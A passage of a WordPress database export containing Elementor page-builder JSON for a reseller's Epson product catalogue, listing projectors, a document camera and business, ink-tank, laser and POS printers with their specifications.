]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7860,3466,'_elementor_version','2.5.14'),(7863,3467,'_wp_page_template','template-fullwidth.php'),(7864,3467,'_elementor_edit_mode','builder'),(7865,3467,'_elementor_template_type','post'),(7866,3467,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/h4><p><br \\/><br \\/>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"47\",\"right\":\"47\",\"bottom\":\"47\",\"left\":\"47\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" 